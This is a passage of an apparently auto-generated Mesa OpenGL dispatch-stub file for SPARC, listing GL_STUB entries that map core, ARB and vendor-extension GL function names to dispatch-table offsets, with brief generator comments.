GL_STUB(glStencilOp, _gloffset_StencilOp)
GL_STUB(glDepthFunc, _gloffset_DepthFunc)
GL_STUB(glPixelZoom, _gloffset_PixelZoom)
GL_STUB(glPixelTransferf, _gloffset_PixelTransferf)
GL_STUB(glPixelTransferi, _gloffset_PixelTransferi)
GL_STUB(glPixelStoref, _gloffset_PixelStoref)
GL_STUB(glPixelStorei, _gloffset_PixelStorei)
GL_STUB(glPixelMapfv, _gloffset_PixelMapfv)
GL_STUB(glPixelMapuiv, _gloffset_PixelMapuiv)
GL_STUB(glPixelMapusv, _gloffset_PixelMapusv)
GL_STUB(glReadBuffer, _gloffset_ReadBuffer)
GL_STUB(glCopyPixels, _gloffset_CopyPixels)
GL_STUB(glReadPixels, _gloffset_ReadPixels)
GL_STUB(glDrawPixels, _gloffset_DrawPixels)
GL_STUB(glGetBooleanv, _gloffset_GetBooleanv)
GL_STUB(glGetClipPlane, _gloffset_GetClipPlane)
GL_STUB(glGetDoublev, _gloffset_GetDoublev)
GL_STUB(glGetError, _gloffset_GetError)
GL_STUB(glGetFloatv, _gloffset_GetFloatv)
GL_STUB(glGetIntegerv, _gloffset_GetIntegerv)
GL_STUB(glGetLightfv, _gloffset_GetLightfv)
GL_STUB(glGetLightiv, _gloffset_GetLightiv)
GL_STUB(glGetMapdv, _gloffset_GetMapdv)
GL_STUB(glGetMapfv, _gloffset_GetMapfv)
GL_STUB(glGetMapiv, _gloffset_GetMapiv)
GL_STUB(glGetMaterialfv, _gloffset_GetMaterialfv)
GL_STUB(glGetMaterialiv, _gloffset_GetMaterialiv)
GL_STUB(glGetPixelMapfv, _gloffset_GetPixelMapfv)
GL_STUB(glGetPixelMapuiv, _gloffset_GetPixelMapuiv)
GL_STUB(glGetPixelMapusv, _gloffset_GetPixelMapusv)
GL_STUB(glGetPolygonStipple, _gloffset_GetPolygonStipple)
GL_STUB(glGetString, _gloffset_GetString)
GL_STUB(glGetTexEnvfv, _gloffset_GetTexEnvfv)
GL_STUB(glGetTexEnviv, _gloffset_GetTexEnviv)
GL_STUB(glGetTexGendv, _gloffset_GetTexGendv)
GL_STUB(glGetTexGenfv, _gloffset_GetTexGenfv)
GL_STUB(glGetTexGeniv, _gloffset_GetTexGeniv)
GL_STUB(glGetTexImage, _gloffset_GetTexImage)
GL_STUB(glGetTexParameterfv, _gloffset_GetTexParameterfv)
GL_STUB(glGetTexParameteriv, _gloffset_GetTexParameteriv)
GL_STUB(glGetTexLevelParameterfv, _gloffset_GetTexLevelParameterfv)
GL_STUB(glGetTexLevelParameteriv, _gloffset_GetTexLevelParameteriv)
GL_STUB(glIsEnabled, _gloffset_IsEnabled)
GL_STUB(glIsList, _gloffset_IsList)
GL_STUB(glDepthRange, _gloffset_DepthRange)
GL_STUB(glFrustum, _gloffset_Frustum)
GL_STUB(glLoadIdentity, _gloffset_LoadIdentity)
GL_STUB(glLoadMatrixf, _gloffset_LoadMatrixf)
GL_STUB(glLoadMatrixd, _gloffset_LoadMatrixd)
GL_STUB(glMatrixMode, _gloffset_MatrixMode)
GL_STUB(glMultMatrixf, _gloffset_MultMatrixf)
GL_STUB(glMultMatrixd, _gloffset_MultMatrixd)
GL_STUB(glOrtho, _gloffset_Ortho)
GL_STUB(glPopMatrix, _gloffset_PopMatrix)
GL_STUB(glPushMatrix, _gloffset_PushMatrix)
GL_STUB(glRotated, _gloffset_Rotated)
GL_STUB(glRotatef, _gloffset_Rotatef)
GL_STUB(glScaled, _gloffset_Scaled)
GL_STUB(glScalef, _gloffset_Scalef)
GL_STUB(glTranslated, _gloffset_Translated)
GL_STUB(glTranslatef, _gloffset_Translatef)
GL_STUB(glViewport, _gloffset_Viewport)
GL_STUB(glArrayElement, _gloffset_ArrayElement)
GL_STUB(glBindTexture, _gloffset_BindTexture)
GL_STUB(glColorPointer, _gloffset_ColorPointer)
GL_STUB(glDisableClientState, _gloffset_DisableClientState)
GL_STUB(glDrawArrays, _gloffset_DrawArrays)
GL_STUB(glDrawElements, _gloffset_DrawElements)
GL_STUB(glEdgeFlagPointer, _gloffset_EdgeFlagPointer)
GL_STUB(glEnableClientState, _gloffset_EnableClientState)
GL_STUB(glIndexPointer, _gloffset_IndexPointer)
GL_STUB(glIndexub, _gloffset_Indexub)
GL_STUB(glIndexubv, _gloffset_Indexubv)
GL_STUB(glInterleavedArrays, _gloffset_InterleavedArrays)
GL_STUB(glNormalPointer, _gloffset_NormalPointer)
GL_STUB(glPolygonOffset, _gloffset_PolygonOffset)
GL_STUB(glTexCoordPointer, _gloffset_TexCoordPointer)
GL_STUB(glVertexPointer, _gloffset_VertexPointer)
GL_STUB(glAreTexturesResident, _gloffset_AreTexturesResident)
GL_STUB(glCopyTexImage1D, _gloffset_CopyTexImage1D)
GL_STUB(glCopyTexImage2D, _gloffset_CopyTexImage2D)
GL_STUB(glCopyTexSubImage1D, _gloffset_CopyTexSubImage1D)
GL_STUB(glCopyTexSubImage2D, _gloffset_CopyTexSubImage2D)
GL_STUB(glDeleteTextures, _gloffset_DeleteTextures)
GL_STUB(glGenTextures, _gloffset_GenTextures)
GL_STUB(glGetPointerv, _gloffset_GetPointerv)
GL_STUB(glIsTexture, _gloffset_IsTexture)
GL_STUB(glPrioritizeTextures, _gloffset_PrioritizeTextures)
GL_STUB(glTexSubImage1D, _gloffset_TexSubImage1D)
GL_STUB(glTexSubImage2D, _gloffset_TexSubImage2D)
GL_STUB(glPopClientAttrib, _gloffset_PopClientAttrib)
GL_STUB(glPushClientAttrib, _gloffset_PushClientAttrib)
GL_STUB(glBlendColor, _gloffset_BlendColor)
GL_STUB(glBlendEquation, _gloffset_BlendEquation)
GL_STUB(glDrawRangeElements, _gloffset_DrawRangeElements)
GL_STUB(glColorTable, _gloffset_ColorTable)
GL_STUB(glColorTableParameterfv, _gloffset_ColorTableParameterfv)
GL_STUB(glColorTableParameteriv, _gloffset_ColorTableParameteriv)
GL_STUB(glCopyColorTable, _gloffset_CopyColorTable)
GL_STUB(glGetColorTable, _gloffset_GetColorTable)
GL_STUB(glGetColorTableParameterfv, _gloffset_GetColorTableParameterfv)
GL_STUB(glGetColorTableParameteriv, _gloffset_GetColorTableParameteriv)
GL_STUB(glColorSubTable, _gloffset_ColorSubTable)
GL_STUB(glCopyColorSubTable, _gloffset_CopyColorSubTable)
GL_STUB(glConvolutionFilter1D, _gloffset_ConvolutionFilter1D)
GL_STUB(glConvolutionFilter2D, _gloffset_ConvolutionFilter2D)
GL_STUB(glConvolutionParameterf, _gloffset_ConvolutionParameterf)
GL_STUB(glConvolutionParameterfv, _gloffset_ConvolutionParameterfv)
GL_STUB(glConvolutionParameteri, _gloffset_ConvolutionParameteri)
GL_STUB(glConvolutionParameteriv, _gloffset_ConvolutionParameteriv)
GL_STUB(glCopyConvolutionFilter1D, _gloffset_CopyConvolutionFilter1D)
GL_STUB(glCopyConvolutionFilter2D, _gloffset_CopyConvolutionFilter2D)
GL_STUB(glGetConvolutionFilter, _gloffset_GetConvolutionFilter)
GL_STUB(glGetConvolutionParameterfv, _gloffset_GetConvolutionParameterfv)
GL_STUB(glGetConvolutionParameteriv, _gloffset_GetConvolutionParameteriv)
GL_STUB(glGetSeparableFilter, _gloffset_GetSeparableFilter)
GL_STUB(glSeparableFilter2D, _gloffset_SeparableFilter2D)
GL_STUB(glGetHistogram, _gloffset_GetHistogram)
GL_STUB(glGetHistogramParameterfv, _gloffset_GetHistogramParameterfv)
GL_STUB(glGetHistogramParameteriv, _gloffset_GetHistogramParameteriv)
GL_STUB(glGetMinmax, _gloffset_GetMinmax)
GL_STUB(glGetMinmaxParameterfv, _gloffset_GetMinmaxParameterfv)
GL_STUB(glGetMinmaxParameteriv, _gloffset_GetMinmaxParameteriv)
GL_STUB(glHistogram, _gloffset_Histogram)
GL_STUB(glMinmax, _gloffset_Minmax)
GL_STUB(glResetHistogram, _gloffset_ResetHistogram)
GL_STUB(glResetMinmax, _gloffset_ResetMinmax)
GL_STUB(glTexImage3D, _gloffset_TexImage3D)
GL_STUB(glTexSubImage3D, _gloffset_TexSubImage3D)
GL_STUB(glCopyTexSubImage3D, _gloffset_CopyTexSubImage3D)
/*
 * Auto-generated SPARC glapi dispatch stubs — GL 1.3+ / ARB extension entry
 * points (multitexture, shader objects, VBOs, occlusion queries, program
 * objects). Same table as the core stubs above: each GL_STUB(name, offset)
 * exports `name` and dispatches through table slot `offset`.
 * NOTE(review): entries are position-sensitive; regenerate rather than edit.
 */
GL_STUB(glActiveTextureARB, _gloffset_ActiveTextureARB)
GL_STUB(glClientActiveTextureARB, _gloffset_ClientActiveTextureARB)
GL_STUB(glMultiTexCoord1dARB, _gloffset_MultiTexCoord1dARB)
GL_STUB(glMultiTexCoord1dvARB, _gloffset_MultiTexCoord1dvARB)
GL_STUB(glMultiTexCoord1fARB, _gloffset_MultiTexCoord1fARB)
GL_STUB(glMultiTexCoord1fvARB, _gloffset_MultiTexCoord1fvARB)
GL_STUB(glMultiTexCoord1iARB, _gloffset_MultiTexCoord1iARB)
GL_STUB(glMultiTexCoord1ivARB, _gloffset_MultiTexCoord1ivARB)
GL_STUB(glMultiTexCoord1sARB, _gloffset_MultiTexCoord1sARB)
GL_STUB(glMultiTexCoord1svARB, _gloffset_MultiTexCoord1svARB)
GL_STUB(glMultiTexCoord2dARB, _gloffset_MultiTexCoord2dARB)
GL_STUB(glMultiTexCoord2dvARB, _gloffset_MultiTexCoord2dvARB)
GL_STUB(glMultiTexCoord2fARB, _gloffset_MultiTexCoord2fARB)
GL_STUB(glMultiTexCoord2fvARB, _gloffset_MultiTexCoord2fvARB)
GL_STUB(glMultiTexCoord2iARB, _gloffset_MultiTexCoord2iARB)
GL_STUB(glMultiTexCoord2ivARB, _gloffset_MultiTexCoord2ivARB)
GL_STUB(glMultiTexCoord2sARB, _gloffset_MultiTexCoord2sARB)
GL_STUB(glMultiTexCoord2svARB, _gloffset_MultiTexCoord2svARB)
GL_STUB(glMultiTexCoord3dARB, _gloffset_MultiTexCoord3dARB)
GL_STUB(glMultiTexCoord3dvARB, _gloffset_MultiTexCoord3dvARB)
GL_STUB(glMultiTexCoord3fARB, _gloffset_MultiTexCoord3fARB)
GL_STUB(glMultiTexCoord3fvARB, _gloffset_MultiTexCoord3fvARB)
GL_STUB(glMultiTexCoord3iARB, _gloffset_MultiTexCoord3iARB)
GL_STUB(glMultiTexCoord3ivARB, _gloffset_MultiTexCoord3ivARB)
GL_STUB(glMultiTexCoord3sARB, _gloffset_MultiTexCoord3sARB)
GL_STUB(glMultiTexCoord3svARB, _gloffset_MultiTexCoord3svARB)
GL_STUB(glMultiTexCoord4dARB, _gloffset_MultiTexCoord4dARB)
GL_STUB(glMultiTexCoord4dvARB, _gloffset_MultiTexCoord4dvARB)
GL_STUB(glMultiTexCoord4fARB, _gloffset_MultiTexCoord4fARB)
GL_STUB(glMultiTexCoord4fvARB, _gloffset_MultiTexCoord4fvARB)
GL_STUB(glMultiTexCoord4iARB, _gloffset_MultiTexCoord4iARB)
GL_STUB(glMultiTexCoord4ivARB, _gloffset_MultiTexCoord4ivARB)
GL_STUB(glMultiTexCoord4sARB, _gloffset_MultiTexCoord4sARB)
GL_STUB(glMultiTexCoord4svARB, _gloffset_MultiTexCoord4svARB)
/* GL 2.0 shader / program object entry points */
GL_STUB(glAttachShader, _gloffset_AttachShader)
GL_STUB(glCreateProgram, _gloffset_CreateProgram)
GL_STUB(glCreateShader, _gloffset_CreateShader)
GL_STUB(glDeleteProgram, _gloffset_DeleteProgram)
GL_STUB(glDeleteShader, _gloffset_DeleteShader)
GL_STUB(glDetachShader, _gloffset_DetachShader)
GL_STUB(glGetAttachedShaders, _gloffset_GetAttachedShaders)
GL_STUB(glGetProgramInfoLog, _gloffset_GetProgramInfoLog)
GL_STUB(glGetProgramiv, _gloffset_GetProgramiv)
GL_STUB(glGetShaderInfoLog, _gloffset_GetShaderInfoLog)
GL_STUB(glGetShaderiv, _gloffset_GetShaderiv)
GL_STUB(glIsProgram, _gloffset_IsProgram)
GL_STUB(glIsShader, _gloffset_IsShader)
GL_STUB(glStencilFuncSeparate, _gloffset_StencilFuncSeparate)
GL_STUB(glStencilMaskSeparate, _gloffset_StencilMaskSeparate)
GL_STUB(glStencilOpSeparate, _gloffset_StencilOpSeparate)
/* GL 2.1 non-square uniform matrices */
GL_STUB(glUniformMatrix2x3fv, _gloffset_UniformMatrix2x3fv)
GL_STUB(glUniformMatrix2x4fv, _gloffset_UniformMatrix2x4fv)
GL_STUB(glUniformMatrix3x2fv, _gloffset_UniformMatrix3x2fv)
GL_STUB(glUniformMatrix3x4fv, _gloffset_UniformMatrix3x4fv)
GL_STUB(glUniformMatrix4x2fv, _gloffset_UniformMatrix4x2fv)
GL_STUB(glUniformMatrix4x3fv, _gloffset_UniformMatrix4x3fv)
GL_STUB(glLoadTransposeMatrixdARB, _gloffset_LoadTransposeMatrixdARB)
GL_STUB(glLoadTransposeMatrixfARB, _gloffset_LoadTransposeMatrixfARB)
GL_STUB(glMultTransposeMatrixdARB, _gloffset_MultTransposeMatrixdARB)
GL_STUB(glMultTransposeMatrixfARB, _gloffset_MultTransposeMatrixfARB)
GL_STUB(glSampleCoverageARB, _gloffset_SampleCoverageARB)
/* ARB_texture_compression */
GL_STUB(glCompressedTexImage1DARB, _gloffset_CompressedTexImage1DARB)
GL_STUB(glCompressedTexImage2DARB, _gloffset_CompressedTexImage2DARB)
GL_STUB(glCompressedTexImage3DARB, _gloffset_CompressedTexImage3DARB)
GL_STUB(glCompressedTexSubImage1DARB, _gloffset_CompressedTexSubImage1DARB)
GL_STUB(glCompressedTexSubImage2DARB, _gloffset_CompressedTexSubImage2DARB)
GL_STUB(glCompressedTexSubImage3DARB, _gloffset_CompressedTexSubImage3DARB)
GL_STUB(glGetCompressedTexImageARB, _gloffset_GetCompressedTexImageARB)
/* ARB_vertex_program / ARB_fragment_program */
GL_STUB(glDisableVertexAttribArrayARB, _gloffset_DisableVertexAttribArrayARB)
GL_STUB(glEnableVertexAttribArrayARB, _gloffset_EnableVertexAttribArrayARB)
GL_STUB(glGetProgramEnvParameterdvARB, _gloffset_GetProgramEnvParameterdvARB)
GL_STUB(glGetProgramEnvParameterfvARB, _gloffset_GetProgramEnvParameterfvARB)
GL_STUB(glGetProgramLocalParameterdvARB, _gloffset_GetProgramLocalParameterdvARB)
GL_STUB(glGetProgramLocalParameterfvARB, _gloffset_GetProgramLocalParameterfvARB)
GL_STUB(glGetProgramStringARB, _gloffset_GetProgramStringARB)
GL_STUB(glGetProgramivARB, _gloffset_GetProgramivARB)
GL_STUB(glGetVertexAttribdvARB, _gloffset_GetVertexAttribdvARB)
GL_STUB(glGetVertexAttribfvARB, _gloffset_GetVertexAttribfvARB)
GL_STUB(glGetVertexAttribivARB, _gloffset_GetVertexAttribivARB)
GL_STUB(glProgramEnvParameter4dARB, _gloffset_ProgramEnvParameter4dARB)
GL_STUB(glProgramEnvParameter4dvARB, _gloffset_ProgramEnvParameter4dvARB)
GL_STUB(glProgramEnvParameter4fARB, _gloffset_ProgramEnvParameter4fARB)
GL_STUB(glProgramEnvParameter4fvARB, _gloffset_ProgramEnvParameter4fvARB)
GL_STUB(glProgramLocalParameter4dARB, _gloffset_ProgramLocalParameter4dARB)
GL_STUB(glProgramLocalParameter4dvARB, _gloffset_ProgramLocalParameter4dvARB)
GL_STUB(glProgramLocalParameter4fARB, _gloffset_ProgramLocalParameter4fARB)
GL_STUB(glProgramLocalParameter4fvARB, _gloffset_ProgramLocalParameter4fvARB)
GL_STUB(glProgramStringARB, _gloffset_ProgramStringARB)
GL_STUB(glVertexAttrib1dARB, _gloffset_VertexAttrib1dARB)
GL_STUB(glVertexAttrib1dvARB, _gloffset_VertexAttrib1dvARB)
GL_STUB(glVertexAttrib1fARB, _gloffset_VertexAttrib1fARB)
GL_STUB(glVertexAttrib1fvARB, _gloffset_VertexAttrib1fvARB)
GL_STUB(glVertexAttrib1sARB, _gloffset_VertexAttrib1sARB)
GL_STUB(glVertexAttrib1svARB, _gloffset_VertexAttrib1svARB)
GL_STUB(glVertexAttrib2dARB, _gloffset_VertexAttrib2dARB)
GL_STUB(glVertexAttrib2dvARB, _gloffset_VertexAttrib2dvARB)
GL_STUB(glVertexAttrib2fARB, _gloffset_VertexAttrib2fARB)
GL_STUB(glVertexAttrib2fvARB, _gloffset_VertexAttrib2fvARB)
GL_STUB(glVertexAttrib2sARB, _gloffset_VertexAttrib2sARB)
GL_STUB(glVertexAttrib2svARB, _gloffset_VertexAttrib2svARB)
GL_STUB(glVertexAttrib3dARB, _gloffset_VertexAttrib3dARB)
GL_STUB(glVertexAttrib3dvARB, _gloffset_VertexAttrib3dvARB)
GL_STUB(glVertexAttrib3fARB, _gloffset_VertexAttrib3fARB)
GL_STUB(glVertexAttrib3fvARB, _gloffset_VertexAttrib3fvARB)
GL_STUB(glVertexAttrib3sARB, _gloffset_VertexAttrib3sARB)
GL_STUB(glVertexAttrib3svARB, _gloffset_VertexAttrib3svARB)
GL_STUB(glVertexAttrib4NbvARB, _gloffset_VertexAttrib4NbvARB)
GL_STUB(glVertexAttrib4NivARB, _gloffset_VertexAttrib4NivARB)
GL_STUB(glVertexAttrib4NsvARB, _gloffset_VertexAttrib4NsvARB)
GL_STUB(glVertexAttrib4NubARB, _gloffset_VertexAttrib4NubARB)
GL_STUB(glVertexAttrib4NubvARB, _gloffset_VertexAttrib4NubvARB)
GL_STUB(glVertexAttrib4NuivARB, _gloffset_VertexAttrib4NuivARB)
GL_STUB(glVertexAttrib4NusvARB, _gloffset_VertexAttrib4NusvARB)
GL_STUB(glVertexAttrib4bvARB, _gloffset_VertexAttrib4bvARB)
GL_STUB(glVertexAttrib4dARB, _gloffset_VertexAttrib4dARB)
GL_STUB(glVertexAttrib4dvARB, _gloffset_VertexAttrib4dvARB)
GL_STUB(glVertexAttrib4fARB, _gloffset_VertexAttrib4fARB)
GL_STUB(glVertexAttrib4fvARB, _gloffset_VertexAttrib4fvARB)
GL_STUB(glVertexAttrib4ivARB, _gloffset_VertexAttrib4ivARB)
GL_STUB(glVertexAttrib4sARB, _gloffset_VertexAttrib4sARB)
GL_STUB(glVertexAttrib4svARB, _gloffset_VertexAttrib4svARB)
GL_STUB(glVertexAttrib4ubvARB, _gloffset_VertexAttrib4ubvARB)
GL_STUB(glVertexAttrib4uivARB, _gloffset_VertexAttrib4uivARB)
GL_STUB(glVertexAttrib4usvARB, _gloffset_VertexAttrib4usvARB)
GL_STUB(glVertexAttribPointerARB, _gloffset_VertexAttribPointerARB)
/* ARB_vertex_buffer_object */
GL_STUB(glBindBufferARB, _gloffset_BindBufferARB)
GL_STUB(glBufferDataARB, _gloffset_BufferDataARB)
GL_STUB(glBufferSubDataARB, _gloffset_BufferSubDataARB)
GL_STUB(glDeleteBuffersARB, _gloffset_DeleteBuffersARB)
GL_STUB(glGenBuffersARB, _gloffset_GenBuffersARB)
GL_STUB(glGetBufferParameterivARB, _gloffset_GetBufferParameterivARB)
GL_STUB(glGetBufferPointervARB, _gloffset_GetBufferPointervARB)
GL_STUB(glGetBufferSubDataARB, _gloffset_GetBufferSubDataARB)
GL_STUB(glIsBufferARB, _gloffset_IsBufferARB)
GL_STUB(glMapBufferARB, _gloffset_MapBufferARB)
GL_STUB(glUnmapBufferARB, _gloffset_UnmapBufferARB)
/* ARB_occlusion_query */
GL_STUB(glBeginQueryARB, _gloffset_BeginQueryARB)
GL_STUB(glDeleteQueriesARB, _gloffset_DeleteQueriesARB)
GL_STUB(glEndQueryARB, _gloffset_EndQueryARB)
GL_STUB(glGenQueriesARB, _gloffset_GenQueriesARB)
GL_STUB(glGetQueryObjectivARB, _gloffset_GetQueryObjectivARB)
GL_STUB(glGetQueryObjectuivARB, _gloffset_GetQueryObjectuivARB)
GL_STUB(glGetQueryivARB, _gloffset_GetQueryivARB)
GL_STUB(glIsQueryARB, _gloffset_IsQueryARB)
/* ARB_shader_objects / ARB_vertex_shader */
GL_STUB(glAttachObjectARB, _gloffset_AttachObjectARB)
GL_STUB(glCompileShaderARB, _gloffset_CompileShaderARB)
GL_STUB(glCreateProgramObjectARB, _gloffset_CreateProgramObjectARB)
GL_STUB(glCreateShaderObjectARB, _gloffset_CreateShaderObjectARB)
GL_STUB(glDeleteObjectARB, _gloffset_DeleteObjectARB)
GL_STUB(glDetachObjectARB, _gloffset_DetachObjectARB)
GL_STUB(glGetActiveUniformARB, _gloffset_GetActiveUniformARB)
GL_STUB(glGetAttachedObjectsARB, _gloffset_GetAttachedObjectsARB)
GL_STUB(glGetHandleARB, _gloffset_GetHandleARB)
GL_STUB(glGetInfoLogARB, _gloffset_GetInfoLogARB)
GL_STUB(glGetObjectParameterfvARB, _gloffset_GetObjectParameterfvARB)
GL_STUB(glGetObjectParameterivARB, _gloffset_GetObjectParameterivARB)
GL_STUB(glGetShaderSourceARB, _gloffset_GetShaderSourceARB)
GL_STUB(glGetUniformLocationARB, _gloffset_GetUniformLocationARB)
GL_STUB(glGetUniformfvARB, _gloffset_GetUniformfvARB)
GL_STUB(glGetUniformivARB, _gloffset_GetUniformivARB)
GL_STUB(glLinkProgramARB, _gloffset_LinkProgramARB)
GL_STUB(glShaderSourceARB, _gloffset_ShaderSourceARB)
GL_STUB(glUniform1fARB, _gloffset_Uniform1fARB)
GL_STUB(glUniform1fvARB, _gloffset_Uniform1fvARB)
GL_STUB(glUniform1iARB, _gloffset_Uniform1iARB)
GL_STUB(glUniform1ivARB, _gloffset_Uniform1ivARB)
GL_STUB(glUniform2fARB, _gloffset_Uniform2fARB)
GL_STUB(glUniform2fvARB, _gloffset_Uniform2fvARB)
GL_STUB(glUniform2iARB, _gloffset_Uniform2iARB)
GL_STUB(glUniform2ivARB, _gloffset_Uniform2ivARB)
GL_STUB(glUniform3fARB, _gloffset_Uniform3fARB)
GL_STUB(glUniform3fvARB, _gloffset_Uniform3fvARB)
GL_STUB(glUniform3iARB, _gloffset_Uniform3iARB)
GL_STUB(glUniform3ivARB, _gloffset_Uniform3ivARB)
GL_STUB(glUniform4fARB, _gloffset_Uniform4fARB)
GL_STUB(glUniform4fvARB, _gloffset_Uniform4fvARB)
GL_STUB(glUniform4iARB, _gloffset_Uniform4iARB)
GL_STUB(glUniform4ivARB, _gloffset_Uniform4ivARB)
GL_STUB(glUniformMatrix2fvARB, _gloffset_UniformMatrix2fvARB)
GL_STUB(glUniformMatrix3fvARB, _gloffset_UniformMatrix3fvARB)
GL_STUB(glUniformMatrix4fvARB, _gloffset_UniformMatrix4fvARB)
GL_STUB(glUseProgramObjectARB, _gloffset_UseProgramObjectARB)
GL_STUB(glValidateProgramARB, _gloffset_ValidateProgramARB)
GL_STUB(glBindAttribLocationARB, _gloffset_BindAttribLocationARB)
GL_STUB(glGetActiveAttribARB, _gloffset_GetActiveAttribARB)
GL_STUB(glGetAttribLocationARB, _gloffset_GetAttribLocationARB)
GL_STUB(glDrawBuffersARB, _gloffset_DrawBuffersARB)
/*
 * Auto-generated SPARC glapi dispatch stubs — EXT / NV / ATI / MESA vendor
 * extension entry points. The numbered gl_dispatch_stub_NNN entries
 * presumably occupy dispatch slots with no public name exported from this
 * build (the number matches the slot index) — TODO confirm against the
 * generator. As above: position-sensitive table, do not reorder by hand.
 */
GL_STUB(glPolygonOffsetEXT, _gloffset_PolygonOffsetEXT)
GL_STUB(gl_dispatch_stub_562, _gloffset__dispatch_stub_562)
GL_STUB(gl_dispatch_stub_563, _gloffset__dispatch_stub_563)
GL_STUB(gl_dispatch_stub_564, _gloffset__dispatch_stub_564)
GL_STUB(gl_dispatch_stub_565, _gloffset__dispatch_stub_565)
GL_STUB(gl_dispatch_stub_566, _gloffset__dispatch_stub_566)
GL_STUB(gl_dispatch_stub_567, _gloffset__dispatch_stub_567)
GL_STUB(gl_dispatch_stub_568, _gloffset__dispatch_stub_568)
GL_STUB(gl_dispatch_stub_569, _gloffset__dispatch_stub_569)
/* EXT_vertex_array */
GL_STUB(glColorPointerEXT, _gloffset_ColorPointerEXT)
GL_STUB(glEdgeFlagPointerEXT, _gloffset_EdgeFlagPointerEXT)
GL_STUB(glIndexPointerEXT, _gloffset_IndexPointerEXT)
GL_STUB(glNormalPointerEXT, _gloffset_NormalPointerEXT)
GL_STUB(glTexCoordPointerEXT, _gloffset_TexCoordPointerEXT)
GL_STUB(glVertexPointerEXT, _gloffset_VertexPointerEXT)
GL_STUB(glPointParameterfEXT, _gloffset_PointParameterfEXT)
GL_STUB(glPointParameterfvEXT, _gloffset_PointParameterfvEXT)
GL_STUB(glLockArraysEXT, _gloffset_LockArraysEXT)
GL_STUB(glUnlockArraysEXT, _gloffset_UnlockArraysEXT)
GL_STUB(gl_dispatch_stub_580, _gloffset__dispatch_stub_580)
GL_STUB(gl_dispatch_stub_581, _gloffset__dispatch_stub_581)
/* EXT_secondary_color */
GL_STUB(glSecondaryColor3bEXT, _gloffset_SecondaryColor3bEXT)
GL_STUB(glSecondaryColor3bvEXT, _gloffset_SecondaryColor3bvEXT)
GL_STUB(glSecondaryColor3dEXT, _gloffset_SecondaryColor3dEXT)
GL_STUB(glSecondaryColor3dvEXT, _gloffset_SecondaryColor3dvEXT)
GL_STUB(glSecondaryColor3fEXT, _gloffset_SecondaryColor3fEXT)
GL_STUB(glSecondaryColor3fvEXT, _gloffset_SecondaryColor3fvEXT)
GL_STUB(glSecondaryColor3iEXT, _gloffset_SecondaryColor3iEXT)
GL_STUB(glSecondaryColor3ivEXT, _gloffset_SecondaryColor3ivEXT)
GL_STUB(glSecondaryColor3sEXT, _gloffset_SecondaryColor3sEXT)
GL_STUB(glSecondaryColor3svEXT, _gloffset_SecondaryColor3svEXT)
GL_STUB(glSecondaryColor3ubEXT, _gloffset_SecondaryColor3ubEXT)
GL_STUB(glSecondaryColor3ubvEXT, _gloffset_SecondaryColor3ubvEXT)
GL_STUB(glSecondaryColor3uiEXT, _gloffset_SecondaryColor3uiEXT)
GL_STUB(glSecondaryColor3uivEXT, _gloffset_SecondaryColor3uivEXT)
GL_STUB(glSecondaryColor3usEXT, _gloffset_SecondaryColor3usEXT)
GL_STUB(glSecondaryColor3usvEXT, _gloffset_SecondaryColor3usvEXT)
GL_STUB(glSecondaryColorPointerEXT, _gloffset_SecondaryColorPointerEXT)
GL_STUB(glMultiDrawArraysEXT, _gloffset_MultiDrawArraysEXT)
GL_STUB(glMultiDrawElementsEXT, _gloffset_MultiDrawElementsEXT)
/* EXT_fog_coord */
GL_STUB(glFogCoordPointerEXT, _gloffset_FogCoordPointerEXT)
GL_STUB(glFogCoorddEXT, _gloffset_FogCoorddEXT)
GL_STUB(glFogCoorddvEXT, _gloffset_FogCoorddvEXT)
GL_STUB(glFogCoordfEXT, _gloffset_FogCoordfEXT)
GL_STUB(glFogCoordfvEXT, _gloffset_FogCoordfvEXT)
GL_STUB(gl_dispatch_stub_606, _gloffset__dispatch_stub_606)
GL_STUB(glBlendFuncSeparateEXT, _gloffset_BlendFuncSeparateEXT)
/* NV_vertex_array_range / NV_register_combiners */
GL_STUB(glFlushVertexArrayRangeNV, _gloffset_FlushVertexArrayRangeNV)
GL_STUB(glVertexArrayRangeNV, _gloffset_VertexArrayRangeNV)
GL_STUB(glCombinerInputNV, _gloffset_CombinerInputNV)
GL_STUB(glCombinerOutputNV, _gloffset_CombinerOutputNV)
GL_STUB(glCombinerParameterfNV, _gloffset_CombinerParameterfNV)
GL_STUB(glCombinerParameterfvNV, _gloffset_CombinerParameterfvNV)
GL_STUB(glCombinerParameteriNV, _gloffset_CombinerParameteriNV)
GL_STUB(glCombinerParameterivNV, _gloffset_CombinerParameterivNV)
GL_STUB(glFinalCombinerInputNV, _gloffset_FinalCombinerInputNV)
GL_STUB(glGetCombinerInputParameterfvNV, _gloffset_GetCombinerInputParameterfvNV)
GL_STUB(glGetCombinerInputParameterivNV, _gloffset_GetCombinerInputParameterivNV)
GL_STUB(glGetCombinerOutputParameterfvNV, _gloffset_GetCombinerOutputParameterfvNV)
GL_STUB(glGetCombinerOutputParameterivNV, _gloffset_GetCombinerOutputParameterivNV)
GL_STUB(glGetFinalCombinerInputParameterfvNV, _gloffset_GetFinalCombinerInputParameterfvNV)
GL_STUB(glGetFinalCombinerInputParameterivNV, _gloffset_GetFinalCombinerInputParameterivNV)
/* MESA_resize_buffers / MESA_window_pos */
GL_STUB(glResizeBuffersMESA, _gloffset_ResizeBuffersMESA)
GL_STUB(glWindowPos2dMESA, _gloffset_WindowPos2dMESA)
GL_STUB(glWindowPos2dvMESA, _gloffset_WindowPos2dvMESA)
GL_STUB(glWindowPos2fMESA, _gloffset_WindowPos2fMESA)
GL_STUB(glWindowPos2fvMESA, _gloffset_WindowPos2fvMESA)
GL_STUB(glWindowPos2iMESA, _gloffset_WindowPos2iMESA)
GL_STUB(glWindowPos2ivMESA, _gloffset_WindowPos2ivMESA)
GL_STUB(glWindowPos2sMESA, _gloffset_WindowPos2sMESA)
GL_STUB(glWindowPos2svMESA, _gloffset_WindowPos2svMESA)
GL_STUB(glWindowPos3dMESA, _gloffset_WindowPos3dMESA)
GL_STUB(glWindowPos3dvMESA, _gloffset_WindowPos3dvMESA)
GL_STUB(glWindowPos3fMESA, _gloffset_WindowPos3fMESA)
GL_STUB(glWindowPos3fvMESA, _gloffset_WindowPos3fvMESA)
GL_STUB(glWindowPos3iMESA, _gloffset_WindowPos3iMESA)
GL_STUB(glWindowPos3ivMESA, _gloffset_WindowPos3ivMESA)
GL_STUB(glWindowPos3sMESA, _gloffset_WindowPos3sMESA)
GL_STUB(glWindowPos3svMESA, _gloffset_WindowPos3svMESA)
GL_STUB(glWindowPos4dMESA, _gloffset_WindowPos4dMESA)
